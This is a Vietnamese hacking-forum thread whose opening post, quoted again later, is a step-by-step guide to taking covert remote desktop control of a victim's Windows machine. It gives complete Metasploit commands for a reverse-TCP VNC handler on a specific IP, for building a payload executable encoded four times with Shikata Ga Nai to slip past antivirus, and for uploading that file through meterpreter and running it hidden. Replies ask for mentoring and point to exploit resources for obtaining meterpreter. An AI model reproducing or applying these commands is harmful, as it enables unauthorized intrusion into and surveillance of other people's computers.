Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93 · 06/06/2015

Có nhiều tùy chọn để có được quyền truy cập máy tính từ xa với một mục tiêu sẵn có. Để một tin tặc có thể tấn công nạn nhân từ phía sau tường lửa, netcat hỗ trợ điều này. Nhưng hôm nay tôi sẽ giới thiệu một lựa chọn đơn giản hơn là tận dụng " Metasploit reverse Virtual Network Computing (VNC) payload "

1. Đầu tiên chúng ta cài đặt vncviewer trên hệ thống máy tính của tin tặc.

Mã:

sudo apt-get install vncviewer

2. Next, we’ll start a new instance of msfconsole to wait for the VNC reverse-TCP connection

Mã:

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST 74.208.19.32 LHOST => 74.208.19.32
msf exploit(handler) > set LPORT 8080 LPORT => 8080
msf exploit(handler) > exploit


[*]Handler binding to LHOST 0.0.0.0
[*]Started reverse handler
[*]Starting the payload handler...

3. Next, we’ll create a new executable payload to launch the Metasploit reverse VNC payload, encoded with Shikata Ga Nai, as shown here

Mã:

$ ./msfpayload windows/vncinject/reverse_tcp LHOST=74.208.19.32 LPORT=8081 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o vncinject.exe
[*]x86/shikata_ga_nai succeeded with size 102 (iteration=1)
[*]x86/shikata_ga_nai succeeded with size 129 (iteration=2)
[*]x86/shikata_ga_nai succeeded with size 156 (iteration=3)
[*]x86/shikata_ga_nai succeeded with size 183 (iteration=4)

Tin tặc sẽ chờ đợi nạn nhân mở vncinject.exe đã được mã hóa với Shikata Ga Nai nếu bạn đã có meterpreter shell bạn có thể upload nó đến máy nạn nhân và thực thi nó để truy cập đến máy tính từ xa.

Mã:

meterpreter > upload vncinject.exe C:TEMP
[*]uploading

[*]uploaded

: vncinject.exe -> C:TEMP

: vncinject.exe -> C:TEMPvncinject.exe



meterpreter > execute -H -f C:TEMPvncinject.exe Process 7512 created.

Ngay lập tực sau khi thực thi vncinject.exe payload nạ nhân sẽ kết nối ngược trở lại đến msfconsole payload handler của tin tặc trên hệ thống tấn công của tin tặc sẽ khởi động vncviewer.

Một màn hình như ở dưới sẽ hiện ra trên máy tính của tin tặc

Hackerstudent93 · 30/05/2020

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

loạt bài tiếp theo mình sẽ viết những bài về hacking wifi nằm trong chương trình Hacking_Exposed_Wifi của tác giả " JOHNNY C A C H E JOSHUA WRIGHT
VINCENT LIU "

thuipro7409

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

huynh có dạy hacker mũ trắng ko ạ em xin học ạ

thuipro7409

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

anh nào hacker mũ trắng dạy em hacker được ko ạ

DDos

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

sao Anh Việt lẫn lộn thế ...

Hackerstudent93

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

DDos;25868 đã viết:
sao Anh Việt lẫn lộn thế ...

Cố tình để cho mọi người tự dịch và học tiếng anh mà

@_@ DDos nhận em ở trên làm đệ tử đi nha

thuipro7409

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

anh ddos nhận em làm đệ tử nha anh

thuipro7409

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

anh hackerstudent93 nhận em được chứ sao ko anh

GinVN

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93;25869 đã viết:
Cố tình để cho mọi người tự dịch và học tiếng anh mà @_@ DDos nhận em ở trên làm đệ tử đi nha

DDos;25868 đã viết:
sao Anh Việt lẫn lộn thế ...

Hai caca chỉ bảo e vào ngành ATTT với ạ

Hiện e chưa biết bắt đầu ntn. Em mới biết lập trình căn bản Pascal và C thôi ạ

thuipro7409

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

war game em nghe nói học hacker bằng cái war game mà

zEpEr

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

== trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit ạ
không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó

zEpEr

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93;25860 đã viết:
Có nhiều tùy chọn để có được quyền truy cập máy tính từ xa với một mục tiêu sẵn có. Để một tin tặc có thể tấn công nạn nhân từ phía sau tường lửa, netcat hỗ trợ điều này. Nhưng hôm nay tôi sẽ giới thiệu một lựa chọn đơn giản hơn là tận dụng " Metasploit reverse Virtual Network Computing (VNC) payload "

1. Đầu tiên chúng ta cài đặt vncviewer trên hệ thống máy tính của tin tặc.

Mã:

sudo apt-get install vncviewer

2. Next, we’ll start a new instance of msfconsole to wait for the VNC reverse-TCP connection

Mã:

msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp PAYLOAD => windows/vncinject/reverse_tcp msf exploit(handler) > set LHOST 74.208.19.32 LHOST => 74.208.19.32 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > exploit [*]Handler binding to LHOST 0.0.0.0 [*]Started reverse handler [*]Starting the payload handler...

3. Next, we’ll create a new executable payload to launch the Metasploit reverse VNC payload, encoded with Shikata Ga Nai, as shown here

Mã:

$ ./msfpayload windows/vncinject/reverse_tcp LHOST=74.208.19.32 LPORT=8081 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o vncinject.exe [*]x86/shikata_ga_nai succeeded with size 102 (iteration=1) [*]x86/shikata_ga_nai succeeded with size 129 (iteration=2) [*]x86/shikata_ga_nai succeeded with size 156 (iteration=3) [*]x86/shikata_ga_nai succeeded with size 183 (iteration=4)

Tin tặc sẽ chờ đợi nạn nhân mở vncinject.exe đã được mã hóa với Shikata Ga Nai nếu bạn đã có meterpreter shell bạn có thể upload nó đến máy nạn nhân và thực thi nó để truy cập đến máy tính từ xa.

Mã:

meterpreter > upload vncinject.exe C:\\TEMP [*]uploading [*]uploaded : vncinject.exe -> C:\TEMP : vncinject.exe -> C:\TEMP\vncinject.exe meterpreter > execute -H -f C:\\TEMP\\vncinject.exe Process 7512 created.

Ngay lập tực sau khi thực thi vncinject.exe payload nạ nhân sẽ kết nối ngược trở lại đến msfconsole payload handler của tin tặc trên hệ thống tấn công của tin tặc sẽ khởi động vncviewer.

Một màn hình như ở dưới sẽ hiện ra trên máy tính của tin tặc

==' trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit lấy meterpreter> ạ
không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó

DDos

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

zEpEr;25909 đã viết:
==' trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit lấy meterpreter> ạ
không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó

Các bạn có thể tham khảo một vài exploit để lấy meterpreter....

https://goo.gl/wCeUcu

Hackerstudent93

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

DDos;25922 đã viết:
Các bạn có thể tham khảo một vài exploit để lấy meterpreter....

https://goo.gl/wCeUcu

Ddos up lại cái link cho mọi người tham khảo nhé

DDos

Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93;25934 đã viết:
Ddos up lại cái link cho mọi người tham khảo nhé

https://www.youtube.com/playlist?list=PLgmq2kEqEXo_5pVD7D1q_ev65iyPesv3_

CỘNG ĐỒNG AN NINH MẠNG VIỆT NAM

Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93

VIP Members

Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Hackerstudent93

VIP Members

Số người đang xem

Thống kê diễn đàn